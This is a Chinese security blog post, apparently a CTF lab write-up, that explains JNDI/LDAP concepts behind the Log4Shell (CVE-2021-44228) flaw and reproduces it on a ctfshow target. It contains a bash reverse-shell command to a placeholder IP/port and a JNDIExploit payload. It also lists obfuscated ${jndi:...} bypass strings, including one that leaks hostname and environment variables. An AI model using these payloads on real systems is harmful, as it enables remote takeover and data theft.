

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link href="https://fonts.proxy.ustclug.org/css2?family=Noto+Serif+SC&display=swap" rel="stylesheet">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/1avatar.png">
  <link rel="icon" href="/img/bg/avatar1.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="D3n13d">
  <meta name="keywords" content="Web,CTF,渗透测试">
  
    <meta name="description" content="原理剖析几个概念： ​    RMI：Java RMI是专为Java环境设计的远程方法调用机制，远程服务器实现具体的Java方法并提供接口，客户端本地仅需根据接口类的定义，提供相应的参数即可调用远程方法并获取执行结果，使分布在不同的JVM中的对象的外表和行为都像本地对象一样 ​    JNDI：JNDI是Java API，允许客户端通过名称发现和查找数据、对象。这些对象可以存储在不同的命名或目录服">
<meta property="og:type" content="article">
<meta property="og:title" content="Log4j漏洞学习">
<meta property="og:url" content="https://d3n13d.github.io/2022/04/12/Log4j%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="D3n13d &#39;s blog">
<meta property="og:description" content="原理剖析几个概念： ​    RMI：Java RMI是专为Java环境设计的远程方法调用机制，远程服务器实现具体的Java方法并提供接口，客户端本地仅需根据接口类的定义，提供相应的参数即可调用远程方法并获取执行结果，使分布在不同的JVM中的对象的外表和行为都像本地对象一样 ​    JNDI：JNDI是Java API，允许客户端通过名称发现和查找数据、对象。这些对象可以存储在不同的命名或目录服">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204121858835.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122323327.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122324319.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122316909.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122319102.png">
<meta property="og:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122322202.png">
<meta property="article:published_time" content="2022-04-12T10:58:06.000Z">
<meta property="article:modified_time" content="2022-04-12T15:27:14.978Z">
<meta property="article:author" content="D3n13d">
<meta property="article:tag" content="Java">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204121858835.png">
  
  
  <title>Log4j漏洞学习 - D3n13d &#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/scroll.css">
<link rel="stylesheet" href="/themes/hexo-theme-fluid/source/test.css">
<link rel="stylesheet" href="/css/test.css">
<link rel="stylesheet" href="/css/code.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"d3n13d.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":2,"color":"#29d","options":{"showSpinner":true,"trickleSpeed":80}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":"ture","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1,"placement":"left"},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":21256305,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="D3n13d 's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>D3n13d &#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                时间线
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友人
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/bg/tree.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Log4j漏洞学习">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      D3n13d
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-04-12 18:58" pubdate>
        2022年4月12日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      12 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Log4j漏洞学习</h1>
            
            <div class="markdown-body">
              <h2 id="原理剖析"><a href="#原理剖析" class="headerlink" title="原理剖析"></a>原理剖析</h2><p>几个概念：</p>
<p>​    <strong>RMI</strong>：Java RMI是专为Java环境设计的远程方法调用机制，远程服务器实现具体的Java方法并提供接口，客户端本地仅需根据接口类的定义，提供相应的参数即可调用远程方法并获取执行结果，使分布在不同的JVM中的对象的外表和行为都像本地对象一样</p>
<p>​    <strong>JNDI</strong>：JNDI是Java API，允许客户端通过名称发现和查找数据、对象。这些对象可以存储在不同的命名或目录服务中，例如远程方法调用（RMI），公共对象请求代理体系结构（CORBA），轻型目录访问协议（LDAP）或域名服务（DNS）</p>
<p>​    <strong>Naming Service</strong></p>
<p>​    命名服务是将名称与值相关联的实体，称为”绑定”。它提供了一种使用”find”或”search”操作来根据名称查找对象的便捷方式。 就像DNS一样，通过命名服务器提供服务，大部分的J2EE服务器都含有命名服务器 。例如RMI Registry就是使用的Naming Service。</p>
<p>​    <strong>Directory Service</strong></p>
<p>​    是一种特殊的Naming Service，它允许存储和搜索”目录对象”，一个目录对象不同于一个通用对象，目录对象可以与属性关联，因此，目录服务提供了对象属性进行操作功能的扩展。一个目录是由相关联的目录对象组成的系统，一个目录类似于数据库，不过它们通常以类似树的分层结构进行组织。可以简单理解成它是一种简化的RDBMS系统，通过目录具有的属性保存一些简单的信息。下面说到的LDAP就是目录服务。</p>
<p>​    <strong>LDAP</strong>：LDAP是一个目录服务，可以通过目录路径查询到对应目录下的对象（文件）等。即其也是JNDI的实现，通过名称（目录路径）查询到对象（目录下的文件）</p>
<p>​    <strong>Log4j</strong>：我的另一篇文章里有简单提到 简单来说就是 日志系统的功能模块 <a href="https://d3n13d.github.io/2022/03/09/Java-Security/#Log4j">demo导航</a></p>
<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204121858835.png" srcset="/img/loading.gif" lazyload alt="image-20220412185824711"></p>
<center>Log4j攻击原理</center>

<h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><p>来源：ctfshow-Log4j复现</p>
<p><strong>检测</strong></p>
<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122323327.png" srcset="/img/loading.gif" lazyload alt="image-20220412232345272"></p>
<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122324319.png" srcset="/img/loading.gif" lazyload alt="image-20220412232408274"></p>
<p>dnslog这边有记录就中</p>
<p><strong>漏洞利用</strong></p>
<p>JNDIExploit-1.2-SNAPSHOT.jar</p>
<figure class="highlight shell"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><pre><code class="hljs shell">java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip -p 8080<br></code></pre></td></tr></table></figure>

<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122316909.png" srcset="/img/loading.gif" lazyload alt="image-20220412231651851"></p>
<p>这边先启动程序，然后来构建shell</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs awk">bash -i &gt;&amp; <span class="hljs-regexp">/dev/</span>tcp<span class="hljs-regexp">/IP/</span>PORT <span class="hljs-number">0</span>&gt;&amp;<span class="hljs-number">1</span>     <span class="hljs-comment">#我这里12345作为PORT 后面会用到</span><br><span class="hljs-comment"># =&gt; YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC8xMjM0NSAwPiYx   先base64</span><br><span class="hljs-comment"># =&gt; YmFzaCAtaSA%2BJiAvZGV2L3RjcC9JUC8xMjM0NSAwPiYx  然后urlencode</span><br></code></pre></td></tr></table></figure>

<p>随后构建payload</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs elixir"><span class="hljs-variable">$&#123;</span><span class="hljs-symbol">jndi:</span><span class="hljs-symbol">ldap:</span>/<span class="hljs-regexp">/ip:1389/</span>TomcatBypass/Command/Base64/(上面的构建shell最后的结果)&#125;<br></code></pre></td></tr></table></figure>

<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122319102.png" srcset="/img/loading.gif" lazyload alt="image-20220412231951047"></p>
<p>这年头复现个洞都这么不容易….</p>
<p><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202204122322202.png" srcset="/img/loading.gif" lazyload alt="image-20220412232208123"></p>
<center><h3>我是笨比</h3></center>



<h2 id="收集到的一些Bypass手段"><a href="#收集到的一些Bypass手段" class="headerlink" title="收集到的一些Bypass手段"></a>收集到的一些Bypass手段</h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs shell"><span class="hljs-meta">$</span><span class="bash">&#123;jndi:ldap://ip:1389/ badClassName&#125;</span> <br><span class="hljs-meta">$</span><span class="bash">&#123;jndi:rmi://ip&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;::-j&#125;</span>ndi:rmi://ip/Exploit&#125;</span> <br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;lower:jndi&#125;</span>:<span class="hljs-variable">$&#123;lower:rmi&#125;</span>://ip/Exploit&#125;</span> <br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;upper:jndi&#125;</span>:<span class="hljs-variable">$&#123;upper:rmi&#125;</span>://ip/Exploit&#125;</span> <br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;lower:<span class="hljs-variable">$&#123;lower:jndi&#125;</span>&#125;</span>:<span class="hljs-variable">$&#123;lower:rmi&#125;</span>://ip/Exploit&#125;</span> <br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;lower:j&#125;</span><span class="hljs-variable">$&#123;lower:n&#125;</span><span class="hljs-variable">$&#123;lower:d&#125;</span>i:<span class="hljs-variable">$&#123;lower:rmi&#125;</span>://ip/Exploit&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;lower:j&#125;</span><span class="hljs-variable">$&#123;upper:n&#125;</span><span class="hljs-variable">$&#123;lower:d&#125;</span><span class="hljs-variable">$&#123;upper:i&#125;</span>:<span class="hljs-variable">$&#123;lower:r&#125;</span>m<span class="hljs-variable">$&#123;lower:i&#125;</span>&#125;://ip/Exploit&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;upper:j&#125;</span><span class="hljs-variable">$&#123;upper:n&#125;</span><span class="hljs-variable">$&#123;lower:d&#125;</span>i:<span class="hljs-variable">$&#123;upper:rmi&#125;</span>://ip/Exploit&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;upper:j&#125;</span><span class="hljs-variable">$&#123;upper:n&#125;</span><span class="hljs-variable">$&#123;upper:d&#125;</span><span class="hljs-variable">$&#123;upper:i&#125;</span>:<span class="hljs-variable">$&#123;lower:r&#125;</span>m<span class="hljs-variable">$&#123;lower:i&#125;</span>&#125;://ip/Exploit&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;::-j&#125;</span><span class="hljs-variable">$&#123;::-n&#125;</span><span class="hljs-variable">$&#123;::-d&#125;</span><span class="hljs-variable">$&#123;::-i&#125;</span>:<span class="hljs-variable">$&#123;::-r&#125;</span><span class="hljs-variable">$&#123;::-m&#125;</span><span class="hljs-variable">$&#123;::-i&#125;</span>://ip:1389/Exploit&#125;</span> <br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;::-j&#125;</span><span class="hljs-variable">$&#123;::-n&#125;</span><span class="hljs-variable">$&#123;::-d&#125;</span><span class="hljs-variable">$&#123;::-i&#125;</span>:<span class="hljs-variable">$&#123;::-l&#125;</span><span class="hljs-variable">$&#123;::-d&#125;</span><span class="hljs-variable">$&#123;::-a&#125;</span><span class="hljs-variable">$&#123;::-p&#125;</span>://<span class="hljs-variable">$&#123;hostName&#125;</span>.ip&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;upper::-j&#125;</span><span class="hljs-variable">$&#123;upper::-n&#125;</span><span class="hljs-variable">$&#123;::-d&#125;</span><span class="hljs-variable">$&#123;upper::-i&#125;</span>:<span class="hljs-variable">$&#123;upper::-l&#125;</span><span class="hljs-variable">$&#123;upper::-d&#125;</span><span class="hljs-variable">$&#123;upper::-a&#125;</span><span class="hljs-variable">$&#123;upper::-p&#125;</span>://<span class="hljs-variable">$&#123;hostName&#125;</span>.ip&#125;</span><br><span class="hljs-meta">$</span><span class="bash">&#123;<span class="hljs-variable">$&#123;::-j&#125;</span><span class="hljs-variable">$&#123;::-n&#125;</span><span class="hljs-variable">$&#123;::-d&#125;</span><span class="hljs-variable">$&#123;::-i&#125;</span>:<span class="hljs-variable">$&#123;::-l&#125;</span><span class="hljs-variable">$&#123;::-d&#125;</span><span class="hljs-variable">$&#123;::-a&#125;</span><span class="hljs-variable">$&#123;::-p&#125;</span>://<span class="hljs-variable">$&#123;hostName&#125;</span>.<span class="hljs-variable">$&#123;env:COMPUTERNAME&#125;</span>.<span class="hljs-variable">$&#123;env:USERDOMAIN&#125;</span>.<span class="hljs-variable">$&#123;env&#125;</span>.ip</span><br></code></pre></td></tr></table></figure>



<p><strong>参考链接</strong>：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/hilaryfrank/article/details/121939902">Log4j2注入漏洞(CVE-2021-44228)万字深度剖析(二)—漏洞原理</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45677145/article/details/121980230?spm=1001.2101.3001.6650.9&utm_medium=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-9.pc_relevant_antiscanv2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~CTRLIST~Rate-9.pc_relevant_antiscanv2&utm_relevant_index=14">Log4j2 远程代码执行漏洞（cve-2021-44228）复现（反弹shell）</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_52829570/article/details/122496645">ctfshow Log4j复现wp</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/CTF/">CTF</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Java/">Java</a>
                    
                  </div>
                
              </div>
              <p class="note note-warning">
                <strong>本文作者: </strong><a href="/">D3n13d</a> <br>
                <strong>本文链接: </strong><a href="https://d3n13d.github.io/2022/04/12/Log4j%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">https://d3n13d.github.io/2022/04/12/Log4j%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/</a> <br>
                <strong>版权声明: </strong>本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                   </p>
                   
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/04/13/PHP-bypass-disable-function%E4%B9%8B%E9%81%93/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">PHP bypass disable_function之道</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/25/arp%E5%8A%AB%E6%8C%81%E4%B8%8Edns%E6%AC%BA%E9%AA%97/">
                        <span class="hidden-mobile">arp劫持与dns欺骗</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'preferred-color-scheme';
      var dark = 'github-dark';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'D3n13d/utterances');
      s.setAttribute('issue-term', 'title');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  
<br>

<style type="text/css">
    /*头像呼吸光环和鼠标悬停旋转放大*/ 
    .avatar { 
    border-radius: 50%; 
    animation: light 5s ease-in-out infinite; 
    transition: 0.4s; 
    }
     .avatar:hover { 
    transform: scale(1.1) rotate(720deg); 
    } 
    @keyframes light { 
    0%{box-shadow: 0 0 4px rgb(233, 229, 229);} 25%{box-shadow: 0 0 16px rgba(184, 182, 182, 0.9);} 
    50%{box-shadow: 0 0 4px rgb(112, 112, 112);}
     75%{box-shadow: 0 0 16px rgb(74, 74, 74);} 
    100%{box-shadow: 0 0 4px rgb(12, 12, 12);} 
    }
</style>
<!-- <img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202202110012686.png" srcset="/img/loading.gif" lazyload class="rounded mx-auto d-block mt-5" style="width:120px; height:120px;"> -->
<center><img src="https://photo-1308752946.cos.ap-beijing.myqcloud.com/img/Typora/202202110012686.png" srcset="/img/loading.gif" lazyload class="avatar" style="width:120px; height:120px;"></center>
  <br>
  <center> # 曾记否，到中流击水，浪遏飞舟？ </center>
<footer class="text-center mt-5 py-3">
  
  <div class="footer-content">
    <div>
      <span id="timeDate">载入天数...</span>
      <span id="times">载入时分秒...</span>
      <script>
      var now = new Date();
      function createtime(){
          var grt= new Date("01/07/2022 00:00:00");//此处修改你的建站时间或者网站上线时间
          now.setTime(now.getTime()+250);
          days = (now - grt ) / 1000 / 60 / 60 / 24;
          dnum = Math.floor(days);
          hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
          hnum = Math.floor(hours);
          if(String(hnum).length ==1 ){
              hnum = "0" + hnum;
          }
          minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
          mnum = Math.floor(minutes);
          if(String(mnum).length ==1 ){
                    mnum = "0" + mnum;
          }
          seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
          snum = Math.round(seconds);
          if(String(snum).length ==1 ){
                    snum = "0" + snum;
          }
          
          document.getElementById("timeDate").innerHTML = "🚀 &nbsp;"+dnum+"&nbsp天";  //此次自定义显示内容
          document.getElementById("times").innerHTML = hnum + "&nbsp小时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
      }  //此次自定义显示内容
      setInterval("createtime()",250);
      </script>
    </div>
  </div>

  
  
    <!-- 不蒜子统计 -->
    
      <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <span >本站总访问量：
            <span id="busuanzi_value_site_pv"></span>次</span>
    
    
  <div>©2022<a href="https://d3n13d.github.io/">&nbsp;&nbsp;D3n13d 的快乐小屋</a></div>

  
</footer>




  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":true,"trickleSpeed":80})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/metowolf/MetingJS@1.2/dist/Meting.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
